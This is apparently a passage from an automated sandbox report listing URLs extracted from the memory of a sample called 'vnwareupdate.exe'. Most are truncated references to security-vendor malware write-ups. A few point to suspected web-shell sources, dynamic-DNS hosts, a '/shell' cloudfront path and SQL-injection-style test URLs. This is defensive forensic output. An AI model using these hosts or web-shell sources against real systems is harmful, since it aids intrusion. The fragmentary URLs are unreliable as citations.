Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/resume-spam-cryptowall
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/spam-dridex
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/sysadmin-phish
Source: vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/teslacrypt
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/talos/wiper-malware
Source: vnwareupdate.exe, 00000003.00000003.238209992.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/trojanized-putty-software
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/trojanized-putty-softwareLazarus
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/security/trojanized-putty-softwareTrojanized
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/wp-co
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/wp-coAdventures
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://blogs.cisco.com/wp-coSpam
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: http://botzone1.blogspot.com/2015/03/blue-ddos-botnet-stub-source-panel.html
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://botzone1.blogspot.com/2015/03/blue-ddos-botnet-stub-source-panel.htmlBlue
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://botzone1.blogspot.com/2015/03/blue-ddos-botnet-stub-source-panel.htmlLinux/Moose
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-9002
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: http://community.hpe.com/t5/Security-Research/9002-RAT-a-second-building-on-the-Sandworm
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: http://community.websense.com/blogs/securitylabs/archive/2015/06/10/large-malver
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://community.websense.com/blogs/securitylabs/archive/2015/06/10/large-malverChina
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://community.websense.com/blogs/securitylabs/archive/2015/06/10/large-malverLarge
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://community.websense.com/blogs/securitylabs/archive/2015/10/12/japanese-ban
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://community.websense.com/blogs/securitylabs/archive/2015/10/12/japanese-banBanking
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://community.websense.com/blogs/securitylabs/archive/2015/10/12/japanese-banJapanese
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://community.websense.com/blogs/securitylabs/archive/2015/10/12/japanese-banYiSpecter:
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.co.uk/2017/02/russian-apt-apt28-collection-of-sampl
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.co.uk/2017/02/russian-apt-apt28-collection-of-samplAPT28
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.co.uk/2017/02/russian-apt-apt28-collection-of-samplDeciphering
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.co.uk/2017/02/russian-apt-apt28-collection-of-samplEmissary
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.co.uk/2017/02/russian-apt-apt28-collection-of-samplRussian
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.(2010)
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.India
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.s
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.de/2015/08/potao-express-samples.html
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://contagiodump.blogspot.de/2015/08/potao-express-samples.html8
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://csirt.ninja/?p=1103
Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: http://cyber-peace.org/wp-content/uploads/2014/01/Cyberattack_against_Israeli_an
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://cyber-peace.org/wp-content/uploads/2014/01/Cyberattack_against_Israeli_anSystematic
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://cyber-peace.org/wp-content/uploads/2014/01/Cyberattack_against_Israeli_anmiSystematic
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://cyber-peace.org/wp-content/uploads/2014/01/Cyberattack_against_Israeli_anminiduke_indicators_
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://cyber-peace.org/wp-content/uploads/2014/01/Cyberattack_against_Israeli_anorSystematic
Source: vnwareupdate.exe, 00000003.00000002.545077306.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://cyber-peace.org/wp-content/uploads/2014/01/Cyberattack_against_Israeli_antorSystematic
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://cyber.verint.com/nymaim-malware-variant/aAPT28
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf.pOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf.pdf
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf01Operation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfCyOperation
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.233075798.00000000060F3000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfKorea
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfNew
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfOpOperation
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfTnOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfatOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfeaOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfesOperation
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdflOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfn_Operation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfncOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfpoOperation
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdfr_Operation
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://d12zpbetgs1pco.cloudfront.net/Weatherapi/shell
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://d99net.3322.org
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://darkeyev3.blogspot.fi/
Source: vnwareupdate.exe, 00000003.00000003.234026973.0000000005B73000.00000004.00000001.sdmp	String found in binary or memory: http://documents.trendmicro.com/assets/Appendix%20-%20The%20Rise%20and%20Fall%20
Source: vnwareupdate.exe, 00000003.00000003.241963093.0000000005611000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pd
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdBlackEnergy
Source: vnwareupdate.exe, 00000003.00000002.565250671.0000000003FA1000.00000004.00000001.sdmp	String found in binary or memory: http://documents.trendmicro.com/assets/resources/IOC-KillDisk_and_BlackEnergy.pdPrivileges
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://dokumente.linksfraktion.de/inhalt/report-orig.pdf
Source: vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://download.ahnlab.com/kr/site/library/%5bAnalysis%5dDefense_Industry_Threat
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/GDataSecurityBlog/~3/z08Ffq28vyg/babar-espionage-
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/GDataSecurityBlog/~3/z08Ffq28vyg/babar-espionage-Babar
Source: vnwareupdate.exe, 00000003.00000002.568465087.00000000040A1000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/GDataSecurityBlog/~3/z08Ffq28vyg/babar-espionage-Malicious
Source: vnwareupdate.exe, 00000003.00000003.234338719.0000000006073000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/PaloAltoNetworks/~3/xuID4xdAMX4/
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/PaloAltoNetworks/~3/xuID4xdAMX4/8
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/PaloAltoNetworks/~3/xuID4xdAMX4/Filmkan
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/PaloAltoNetworks/~3/xuID4xdAMX4/Turla
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/zscaler/research/~3/KveAeHbavcs/ongoing-angler-ex
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/zscaler/research/~3/KveAeHbavcs/ongoing-angler-exSatellite
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: http://feedproxy.google.com/~r/zscaler/research/~3/KveAeHbavcs/ongoing-angler-exSpyDealer:
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/Nxcmd081znk/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://ftp.powernet.com.tr/supermail/debug/k3
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: http://garwarner.blogspot.com/2016/08/amazon-gift-card-from-kelihos.html
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://garwarner.blogspot.com/2016/08/amazon-gift-card-from-kelihos.htmlAmazon
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: http://garwarner.blogspot.com/2016/08/amazon-gift-card-from-kelihos.htmlStuxnet
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://getalfa.rf.gd/?i=1
Source: vnwareupdate.exe, 00000003.00000003.233668995.0000000005DB3000.00000004.00000001.sdmp	String found in binary or memory: http://go.cybereason.com/rs/996-
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/0Nhax2
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/5VYtlU
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/9Tlk90
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/MJ0c2M
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/SGcS2HSymantec
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/TWGNYE
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/V0epcf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/WiwtYT
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/ZjJy
Source: vnwareupdate.exe, 00000003.00000003.237373308.0000000003787000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/ZjJyti
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/b3pVyL476bf24a4b1e9f4bc2a61b152115e1feDerusbi
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/b3pVyL4c0b2e9d2ef909d15270d4dd7fa5a4a5Derusbi
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/b3pVyL4f4bf27b738ff8f2a89d1bc487b054a8a7bd555866ae1c161f78630a638850e775d3d1f23628122a
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/b3pVyL7bd55818c5971b63dc45cf57cbeb950bDerusbi
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/bGzjmB
Source: vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/bTtpGDMalware
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/bTtpGDTROJ_WERDLOD:
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/d5ujEHKraken
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/f6xNwu
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/f6xNwu8
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/f6xNwue
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/h0dJTr
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/h0dJTr$0i
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/h0dJTr8
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/h0dJTrBackspace
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/h0dJTrFireeye:
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/h0dJTrTargeted
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/igxLyF
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/ivt8EW
Source: vnwareupdate.exe, 00000003.00000002.543787913.0000000003707000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/jcS0lOAPTnotes
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/kAHB9t
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/m2CXWR
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/psjCCc
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/u8WAVh
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/search
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/Chaos:
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/Ransom.ShurL0ckr
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://grimhacker.com/2015/04/10/gp3finder-group-policy-preference-password-finder/
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp	String found in binary or memory: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Adventures-in-PoSeidon-ge
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Adventures-in-PoSeidon-geAdventures
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Adventures-in-PoSeidon-geUncovering
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://hi.baidu.com/ca3tie1/home
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://hi.baidu.com/xahacker/fuck.txt
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.242046472.00000000055D1000.00000004.00000001.sdmp	String found in binary or memory: http://ht.ly/Wg3GY
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: http://ht.ly/Wg3GYScanline
Source: vnwareupdate.exe, 00000003.00000003.237233008.00000000036C1000.00000004.00000001.sdmp	String found in binary or memory: http://ht.ly/Wg3GYp
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://id-ransomware.blogspot.co.uk/2016/10/ishtar-ransomware.html
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: http://id-ransomware.blogspot.co.uk/2016/12/braincrypt-ransomware.html
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: http://id-ransomware.blogspot.co.uk/2017/06/shifr-raas-ransomware.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://iframe.ip138.com/ic.asp
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: http://info.ai.baesystems.com/rs/308-OXI-896/images/The_Return_of_Qbot_WP_V2%20M
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://itsjack.cc/blog/2015/02/krakenhttp-not-sinking-my-ship-part-1/
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: http://johannesbader.ch/2015/01/the-dga-of-symmi/
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: http://johannesbader.ch/2015/01/the-dga-of-symmi/Symmi
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://l-y.vicp.net
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://laudanum.inguardians.com/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://laudanum.secureideas.net
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: http://liuya0904.blogspot.co.uk/2016/04/new-elknotbillgates-variant-with-xor.htm
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/1.asp?id=16
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/index.asp?id=2
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/index.asp?id=zhr
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/retomysql/pista.aspx?id_pista=1
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/07/23/index.html9EITest
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/07/23/index.htmlCryxos.B
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/07/29/index.htmlBlank
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/07/29/index.htmlsBlank
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/07/29/index.htmlture
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: http://malware-traffic-analysis.net/2017/08/01/index.html
